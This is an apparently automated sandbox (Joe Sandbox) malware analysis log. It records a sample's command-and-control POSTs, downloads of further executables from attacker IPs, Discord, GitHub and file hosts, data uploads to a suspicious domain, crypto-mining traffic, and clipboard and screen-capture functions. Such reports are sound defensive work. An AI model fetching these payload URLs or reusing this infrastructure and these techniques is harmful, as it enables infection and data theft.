                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                              Source: Joe Sandbox ViewIP Address: 185.215.113.97 185.215.113.97
                              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:51667 -> 185.215.113.97:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:51670 -> 185.215.113.97:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:51678 -> 185.215.113.97:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51681 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51682 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51685 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51689 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51692 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51690 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51698 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:51694 -> 188.114.96.3:443
                              Source: Network trafficSuricata IDS: 2040353 - Severity 2 - ET COINMINER Observed DNS Query to Cryptocurrency Mining Pool Domain (xmr .2miners .com) : 192.168.2.9:49281 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.9:51780 -> 162.19.139.184:2222
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: modernakdventure.cyou
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: modernakdventure.cyou
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0BPXLOF17D2DSCookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12815Host: modernakdventure.cyou
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0ALQJWRFAV8YCookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15027Host: modernakdventure.cyou
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7LCPSZXZP1FCFTXCKCookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20573Host: modernakdventure.cyou
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6H9P6J229Cookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2388Host: modernakdventure.cyou
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7TB8ATJEUPPA4YCookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569619Host: modernakdventure.cyou
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=L.ttCYXBhM4DeQTWDQchqrf7kYDnOjP_l7FRjEe5Hl4-1739213436-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: modernakdventure.cyou
                              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.97
                              Source: global trafficHTTP traffic detected: GET /attachments/1336331746618376235/1337207374028738580/Sarcastic_Setup.exe?ex=67a69aea&is=67a5496a&hm=3b32825118cc0d524c597462379541f592a0aaa009acbf73f5e08d6fb678b84e& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /raz23-bot/22/raw/refs/heads/main/plugin3.dll HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /raz23-bot/22/raw/refs/heads/main/plugin3.dll HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /raz23-bot/22/refs/heads/main/plugin3.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /raz23-bot/22/refs/heads/main/plugin3.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /files/1453454495/Fe36XBk.exe HTTP/1.1Host: 185.215.113.97
                              Source: global trafficHTTP traffic detected: GET /files/5957639473/kUHbhqh.exe HTTP/1.1Host: 185.215.113.97
                              Source: global trafficHTTP traffic detected: GET /files/6875802221/Ryu8yUx.exe HTTP/1.1Host: 185.215.113.97
                              Source: global trafficDNS traffic detected: DNS query: modernakdventure.cyou
                              Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
                              Source: global trafficDNS traffic detected: DNS query: github.com
                              Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                              Source: global trafficDNS traffic detected: DNS query: xmr.2miners.com
                              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: modernakdventure.cyou
                              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 10 Feb 2025 18:50:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M67HzqnBl18qFMJMsV6Pe4JoFvNpv9kGabkfViFrA2S3NO3uqSOVu1UQThSIodD9ERLZY0HodpZJGOvZGEOUfWlMyC9hvPnWX0HHv0mId6r2JqdsEaPtj9fOfoeDiDBpT2PW4H%2F%2BXYo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90fe492cdce8437a-EWR
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Feb 2025 18:52:48 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=QsO8FwJk3bk_pJrnIVlmFimn_IZdAUeB1ovWNL8KVkc-1739213568-1.0.1.1-NsHx.E_CJDKV_lsaid1d3bUPWUIPuaBiXpxL86o3WGq5jzgxqtAr7EFx_L7gdxxTFn9M_G.yGArs1NHEeyiz_w; path=/; expires=Mon, 10-Feb-25 19:22:48 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aCfPOfzUYC6cuhWuPpxTJlMpsfP7GpvZAqGvdqS1AUq8LerxMlY53xqxi1WZgZWXZWLl%2B2xoF6YGiwRzn63GI8j1099aLNygKmYRfJGFrvPkRuO6Oqw3RlaFnZBByGqE3E4jVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=ia_oGsF.HgF8Huj5OdbwSKheTwb_u6GkFJ0wlgqsBwY-1739213568502-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90fe4c62fcd1428b-EWRalt-svc: h3=":443"; ma=86400
                              Source: kUHbhqh.exe, 0000000B.00000003.2154868593.0000020E9A02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                              Source: kUHbhqh.exe, 0000000B.00000003.2154868593.0000020E9A02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c646809ce4
                              Source: powershell.exe, 0000001D.00000002.2772403978.000002815DE19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2940342709.000001C759C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3173761375.0000011B57B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: powershell.exe, 0000001D.00000002.2728808016.000002814DFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2844312144.000001C749E47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: powershell.exe, 0000001D.00000002.2728808016.000002814DDB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2844312144.000001C749C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B47AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 0000001D.00000002.2728808016.000002814DFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2844312144.000001C749E47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: powershell.exe, 0000001F.00000002.2955986368.000001C761F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
                              Source: powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: Stamp_Setup.exe, 00000017.00000003.2644650082.0000000002380000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.exe, 00000017.00000003.2645334529.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 00000018.00000000.2646578799.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Stamp_Setup.tmp.25.drString found in binary or memory: http://www.innosetup.com/
                              Source: powershell.exe, 0000001F.00000002.2951815408.000001C761D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                              Source: powershell.exe, 00000023.00000002.3199227299.0000011B5FE9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                              Source: Stamp_Setup.exe, 00000017.00000003.2644650082.0000000002380000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.exe, 00000017.00000003.2645334529.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 00000018.00000000.2646578799.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Stamp_Setup.tmp.25.drString found in binary or memory: http://www.remobjects.com/ps
                              Source: powershell.exe, 0000001D.00000002.2728808016.000002814DDB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2844312144.000001C749C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B47AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                              Source: powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B4943D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B496F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B4971B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                              Source: powershell.exe, 0000001F.00000002.2844312144.000001C74B875000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2844312144.000001C74B84F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B496F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B4971B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                              Source: powershell.exe, 00000023.00000002.3173761375.0000011B57B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 00000023.00000002.3173761375.0000011B57B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 00000023.00000002.3173761375.0000011B57B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: kUHbhqh[1].exe.7.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support/rust/deps
                              Source: regsvr32.exe, 0000001C.00000003.3530737909.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3526491127.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3528802556.000000001AF23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/k541xr.dllJ
                              Source: regsvr32.exe, 0000001C.00000003.3527563926.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3526491127.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3528802556.000000001AF23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/kwfxr7.dll
                              Source: powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: regsvr32.exe, 0000001C.00000003.3548142267.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3530737909.000000001AF23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/raz23-bot/22/raw/refs/heads/main/plugin3
                              Source: regsvr32.exe, 0000001C.00000003.3527563926.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3526491127.000000001AF23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.3528802556.000000001AF23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/raz23-bot/22/raw/refs/heads/main/plugin3.dll
                              Source: powershell.exe, 0000001F.00000002.2844312144.000001C74BBF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3030055586.0000011B49A96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                              Source: powershell.exe, 00000023.00000002.3195696699.0000011B5FDE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                              Source: powershell.exe, 0000001D.00000002.2782647331.0000028166200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5mation
                              Source: Ryu8yUx.exe, 0000000D.00000002.2259239960.00000000010DD000.00000004.00000020.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000D.00000002.2260351341.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000D.00000002.2259239960.00000000010C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://modernakdventure.cyou/
                              Source: Ryu8yUx.exe, 0000000D.00000002.2260351341.0000000003670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://modernakdventure.cyou/3M
                              Source: Ryu8yUx.exe, 0000000D.00000002.2259554211.0000000001173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://modernakdventure.cyou/api
                              Source: powershell.exe, 0000001D.00000002.2772403978.000002815DE19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2940342709.000001C759C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3173761375.0000011B57B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51681 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51689
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51767
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51765 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51698 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51681
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51682
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51767 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51764
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51765
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51685
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51694 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51690
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51682 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51764 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51694
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51692
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51698
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51690 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51692 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51689 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 51685 -> 443
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51681 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51682 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51685 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51689 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51690 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51692 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51694 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51698 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.9:51761 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.9:51764 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:51767 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:51769 version: TLS 1.2
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00439020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,13_2_00439020
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_00439020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,13_2_00439020
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004391E0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,13_2_004391E0

                              System Summary

                              barindex
                              Source: 10.2.Fe36XBk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: Mc3FDUMnVz.exeStatic PE information: section name:
                              Source: Mc3FDUMnVz.exeStatic PE information: section name: .idata
                              Source: Mc3FDUMnVz.exeStatic PE information: section name:
                              Source: skotes.exe.0.drStatic PE information: section name:
                              Source: skotes.exe.0.drStatic PE information: section name: .idata
                              Source: skotes.exe.0.drStatic PE information: section name:
                              Source: Fe36XBk[1].exe.7.drStatic PE information: section name:
                              Source: Fe36XBk[1].exe.7.drStatic PE information: section name: .idata
                              Source: Fe36XBk[1].exe.7.drStatic PE information: section name:
                              Source: Fe36XBk.exe.7.drStatic PE information: section name:
                              Source: Fe36XBk.exe.7.drStatic PE information: section name: .idata
                              Source: Fe36XBk.exe.7.drStatic PE information: section name:
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_0018EA0C3_1_0018EA0C
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_001F16703_1_001F1670
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_1_0025204A3_1_0025204A
